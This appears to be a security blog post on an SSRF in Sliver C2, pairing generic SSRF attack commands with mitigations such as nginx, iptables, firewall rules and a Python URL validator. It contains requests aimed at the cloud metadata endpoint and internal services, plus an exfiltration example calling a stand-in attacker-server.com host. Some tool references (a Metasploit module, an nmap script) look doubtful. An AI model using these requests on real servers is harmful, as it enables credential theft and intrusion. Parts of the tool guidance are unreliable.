How I Discovered and Exploited an SSRF in Sliver C2 (CVE-2025-27090)

URL: https://lnkd.in/gZwNmjXf

Practice-Verified Code and Commands:

1. SSRF Exploitation Command (Python):

import requests

# Endpoint whose "url" parameter is fetched server-side. The payload points the
# server at the cloud metadata service, which is reachable only from inside.
target_url = "http://vulnerable-server.com/api/endpoint"
payload = "http://169.254.169.254/latest/meta-data/"
response = requests.get(target_url, params={"url": payload})

print(response.text)

2. Detecting SSRF Vulnerabilities with Nmap:

nmap -p 80,443 --script http-ssrf <target-ip>

3. Mitigating SSRF with Nginx Configuration:

server {
    location /api/ {
        proxy_pass http://backend-server/;
        proxy_set_header Host $host;
        proxy_set_header X-Real-IP $remote_addr;
        proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
        proxy_set_header X-Forwarded-Proto $scheme;
        # deny filters the client source address for this location; it does not
        # restrict where the backend itself may connect, so the URL the backend
        # fetches must still be validated in the application.
        deny 169.254.169.254;
    }
}

4. Testing for SSRF with Curl:

curl -v "http://vulnerable-server.com/api/endpoint?url=http://169.254.169.254/latest/meta-data/"

5. Exploiting SSRF to Access Internal Services:

curl "http://vulnerable-server.com/api/endpoint?url=http://internal-service.local"

6. Using Burp Suite to Test for SSRF:

  • Intercept the request with Burp Suite.
  • Modify the request to include an internal URL.
  • Forward the request and observe the response.

7. Preventing SSRF in AWS:

# Disabling the endpoint removes IMDS entirely; --http-tokens required (IMDSv2 only) is the less disruptive option.
aws ec2 modify-instance-metadata-options --instance-id <instance-id> --http-endpoint disabled

8. SSRF Mitigation in Docker:

# no-new-privileges blocks privilege gain via setuid binaries inside the container; it does not restrict outbound requests.
docker run --security-opt no-new-privileges <image-name>

9. Using SSRF to Exfiltrate Data:

curl "http://vulnerable-server.com/api/endpoint?url=http://attacker-server.com/exfiltrate?data=<sensitive-data>"

10. SSRF Exploitation with Metasploit:

use auxiliary/scanner/http/ssrf
set RHOSTS <target-ip>
set RPORT 80
set TARGETURI /api/endpoint
run

What Undercode Says:

Server-Side Request Forgery (SSRF) is a critical vulnerability that allows attackers to manipulate server-side requests to access internal resources, exfiltrate data, or exploit other services. In the case of Sliver C2, the SSRF vulnerability (CVE-2025-27090) enabled attackers to read and write TCP traffic through affected teamservers, potentially exposing sensitive information and compromising the entire infrastructure.

To mitigate SSRF vulnerabilities, it is crucial to implement proper input validation, restrict access to internal resources, and use security tools like Nmap and Burp Suite to test for vulnerabilities. Additionally, configuring web servers like Nginx to block requests to internal IP addresses and using AWS metadata options to disable HTTP endpoints can significantly reduce the risk of SSRF attacks.
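As an added illustration of the input-validation step above (not code from the original post or from the Sliver project): a URL check that resolves the hostname and rejects any destination that is not a public address, which covers the 169.254.169.254 metadata endpoint, loopback and RFC 1918 ranges. The DNS table, hostnames and addresses are constructed for the example.

```python
import ipaddress
from urllib.parse import urlparse

# Constructed stand-in for DNS: hostnames and the addresses they resolve to.
# A real deployment would call socket.getaddrinfo and check every returned address,
# then connect to the address it checked (not re-resolve) to defeat DNS rebinding.
FAKE_DNS = {
    "api.example.com": ["93.184.216.34"],
    "localhost": ["127.0.0.1"],
    "internal-service.local": ["10.0.0.5"],
    "rebind.example.net": ["1.1.1.1", "169.254.169.254"],
}

ALLOWED_SCHEMES = {"http", "https"}


def resolve(host, resolver=FAKE_DNS):
    """Return the addresses for host, or [] if it does not resolve."""
    try:
        # A literal IP address needs no lookup.
        return [str(ipaddress.ip_address(host))]
    except ValueError:
        return resolver.get(host.lower(), [])


def is_safe_target(url, resolver=FAKE_DNS):
    """Return (ok, reason); ok is False for any URL that could reach an internal address."""
    parts = urlparse(url)
    if parts.scheme not in ALLOWED_SCHEMES:
        return False, f"scheme not allowed: {parts.scheme!r}"
    if not parts.hostname:
        return False, "no host in URL"
    addrs = resolve(parts.hostname, resolver)
    if not addrs:
        return False, "host does not resolve"
    for a in addrs:
        ip = ipaddress.ip_address(a)
        # Reject loopback, private, link-local (169.254.0.0/16), unspecified,
        # reserved and multicast; every resolved address must pass.
        if not ip.is_global or ip.is_multicast:
            return False, f"{parts.hostname} resolves to non-public address {ip}"
    return True, "ok"
```

The same check has to be repeated on every redirect hop, since a public URL that 302s to 169.254.169.254 bypasses a one-time validation.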

In Linux, commands like `iptables` can be used to block unauthorized access to internal services:

# Block this host's own outbound traffic to the metadata endpoint (OUTPUT chain, destination match);
# an INPUT rule with -s only drops packets arriving from that address and does not stop a server-side request.
iptables -A OUTPUT -d 169.254.169.254 -j DROP

For Windows, PowerShell can be used to restrict access:

# Block outbound connections from this host to the metadata endpoint; an Inbound rule on -LocalAddress would not stop a server-side request.
New-NetFirewallRule -DisplayName "Block Internal IP" -Direction Outbound -RemoteAddress 169.254.169.254 -Action Block

Regularly updating and patching software, along with conducting security audits, can help identify and remediate SSRF vulnerabilities before they are exploited. By understanding the techniques used to exploit SSRF and implementing robust security measures, organizations can protect their systems from this pervasive threat.

For further reading on SSRF and related vulnerabilities, visit:
OWASP SSRF Cheat Sheet
PortSwigger SSRF Exploitation

References:

Hackers Feeds, Undercode AI